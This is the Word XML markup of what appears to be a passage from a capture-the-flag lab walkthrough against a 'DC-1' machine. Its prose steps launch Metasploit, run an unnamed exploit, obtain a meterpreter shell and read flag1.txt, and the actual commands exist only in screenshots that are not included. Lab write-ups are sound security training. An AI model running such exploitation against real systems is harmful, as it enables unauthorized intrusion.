    <w:p w14:paraId="17436759" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="0FE074F6" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="30F3BA9D" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="114AEA30" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="0206DC0E" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="5C34A36E" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="6A6EA274" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="315B37C6" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="13777588" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="68E4AAA3" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="2E48585C" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="4E9BB7F2" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="7C2047A1" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="3C12C377" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="01EA545B" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="0B76346D" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="56D3C4AA" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="6A29956E" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="0C14DA3D" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="3677ED96" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="27730CF4" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00603923">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Enter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00603923">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00603923">
        <w:t xml:space="preserve"> msfconsole.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C4A909" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:r w:rsidRPr="00603923">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251709440" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="098DC70D" wp14:editId="2DC0BDAA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>30397</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4039263" cy="2752176"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="200903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30018" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4039263" cy="2752176"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A95812F" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="4489A36B" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="6F4F1450" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="47CB361A" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="59E752CB" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="1A601D4D" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="7450C77F" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="61F4BA20" w14:textId="77777777" w:rsidR="00C94CE0" w:rsidRDefault="00C94CE0" w:rsidP="005705DF"/>
    <w:p w14:paraId="6D74AB45" w14:textId="77777777" w:rsidR="00C94CE0" w:rsidRDefault="00C94CE0" w:rsidP="005705DF"/>
    <w:p w14:paraId="0CAC1C69" w14:textId="77777777" w:rsidR="00C94CE0" w:rsidRDefault="00C94CE0" w:rsidP="005705DF"/>
    <w:p w14:paraId="18056ECD" w14:textId="77777777" w:rsidR="00C94CE0" w:rsidRDefault="00C94CE0" w:rsidP="005705DF"/>
    <w:p w14:paraId="6082A8B5" w14:textId="77777777" w:rsidR="00C94CE0" w:rsidRDefault="00C94CE0" w:rsidP="005705DF"/>
    <w:p w14:paraId="0186D8FB" w14:textId="77777777" w:rsidR="00C94CE0" w:rsidRPr="00603923" w:rsidRDefault="00C94CE0" w:rsidP="005705DF"/>
    <w:p w14:paraId="5A0239A3" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="226A0EA3" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="42CA5EC0" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00603923">
        <w:t>We are going to use the highlighted exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A1CA28" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:r w:rsidRPr="00603923">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251710464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="418C0018" wp14:editId="32EC824B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-3644</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4058216" cy="2800741"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="214340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01579" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4058216" cy="2800741"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D55BA4" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="112966C4" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="7C582BEA" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="5D99B17B" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="6C3AB717" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="238ECD6A" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="386B3041" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="0326F1CD" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="08170431" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="7608808D" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="3F388D43" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="0D971C2F" w14:textId="77777777" w:rsidR="00C37CD1" w:rsidRDefault="00C37CD1" w:rsidP="005705DF"/>
    <w:p w14:paraId="001D8607" w14:textId="77777777" w:rsidR="00C37CD1" w:rsidRDefault="00C37CD1" w:rsidP="005705DF"/>
    <w:p w14:paraId="5491DF8B" w14:textId="77777777" w:rsidR="00C37CD1" w:rsidRDefault="00C37CD1" w:rsidP="005705DF"/>
    <w:p w14:paraId="714E8F23" w14:textId="77777777" w:rsidR="00C37CD1" w:rsidRPr="00603923" w:rsidRDefault="00C37CD1" w:rsidP="005705DF"/>
    <w:p w14:paraId="77900B31" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00603923">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251711488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="364F4E77" wp14:editId="1B81EF31">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>318052</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4635610" cy="550270"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:wrapNone/>
            <wp:docPr id="39017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72087" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4635610" cy="550270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00603923">
        <w:t>Use the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0A5E6B" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="64D52661" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="4D73D40C" w14:textId="77777777" w:rsidR="00C37CD1" w:rsidRPr="00603923" w:rsidRDefault="00C37CD1" w:rsidP="005705DF"/>
    <w:p w14:paraId="602E4CA6" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="6B3F6E58" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00603923">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251712512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="62C1FAF9" wp14:editId="46C609EF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>314215</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5049078" cy="457437"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="56692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2672" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5049078" cy="457437"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00603923">
        <w:t>Set the target to the DC-1 Machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B791156" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="6E9B1BAE" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="6043DE2C" w14:textId="77777777" w:rsidR="00C37CD1" w:rsidRPr="00603923" w:rsidRDefault="00C37CD1" w:rsidP="005705DF"/>
    <w:p w14:paraId="4F81E3C3" w14:textId="4FA43029" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00603923">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251713536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3677E9BF" wp14:editId="521FD3D7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>317141</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5112689" cy="872325"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:wrapNone/>
            <wp:docPr id="152358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88270" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5112689" cy="872325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00603923">
        <w:t>Run the exploit and you will get a meterpreter session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450B8BED" w14:textId="0A71ED2B" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="6703E600" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="273ACBF6" w14:textId="77777777" w:rsidR="00BA3E30" w:rsidRDefault="00BA3E30" w:rsidP="005705DF"/>
    <w:p w14:paraId="02ECF3C1" w14:textId="77777777" w:rsidR="00BA3E30" w:rsidRPr="00603923" w:rsidRDefault="00BA3E30" w:rsidP="005705DF"/>
    <w:p w14:paraId="1B9B8537" w14:textId="4A8AF351" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="38524215" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="46BDF4D3" w14:textId="579D070C" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="00BA3E30" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00603923">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251714560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="400B8DFD" wp14:editId="4C05F666">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>273685</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1478943" cy="3871494"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23189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94997" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1478943" cy="3871494"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="005705DF" w:rsidRPr="00603923">
        <w:t>Enter the shell and we get flag</w:t>
      </w:r>
      <w:r w:rsidR="00AE0F8A">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="005705DF" w:rsidRPr="00603923">
        <w:t>.txt after we list the files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00660A4A" w14:textId="59351C2B" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="65A55EDF" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="14356E60" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="60D8272C" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="5F63BC11" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="1032C666" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="06F1F1F4" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="0ADBC847" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="307BD2F4" w14:textId="77777777" w:rsidR="00BA3E30" w:rsidRDefault="00BA3E30" w:rsidP="005705DF"/>
    <w:p w14:paraId="77171222" w14:textId="77777777" w:rsidR="00BA3E30" w:rsidRDefault="00BA3E30" w:rsidP="005705DF"/>
    <w:p w14:paraId="17C2F24D" w14:textId="77777777" w:rsidR="00BA3E30" w:rsidRDefault="00BA3E30" w:rsidP="005705DF"/>
    <w:p w14:paraId="307D43E3" w14:textId="77777777" w:rsidR="00BA3E30" w:rsidRDefault="00BA3E30" w:rsidP="005705DF"/>
    <w:p w14:paraId="795CA915" w14:textId="77777777" w:rsidR="00BA3E30" w:rsidRPr="00603923" w:rsidRDefault="00BA3E30" w:rsidP="005705DF"/>
    <w:p w14:paraId="2C9F0CD5" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="6CBC1454" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="72984225" w14:textId="77777777" w:rsidR="00BA3E30" w:rsidRDefault="00BA3E30" w:rsidP="005705DF"/>
    <w:p w14:paraId="4EDE7E50" w14:textId="77777777" w:rsidR="00BA3E30" w:rsidRDefault="00BA3E30" w:rsidP="005705DF"/>
    <w:p w14:paraId="5542B4FE" w14:textId="77777777" w:rsidR="00BA3E30" w:rsidRPr="00603923" w:rsidRDefault="00BA3E30" w:rsidP="005705DF"/>
    <w:p w14:paraId="0664C943" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="6389D4CC" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="39B57E8F" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="02C515BC" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="5DDF8258" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00603923">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251715584" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0849E857" wp14:editId="166307C8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>318052</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3832529" cy="486957"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:wrapNone/>
            <wp:docPr id="28364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48874" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
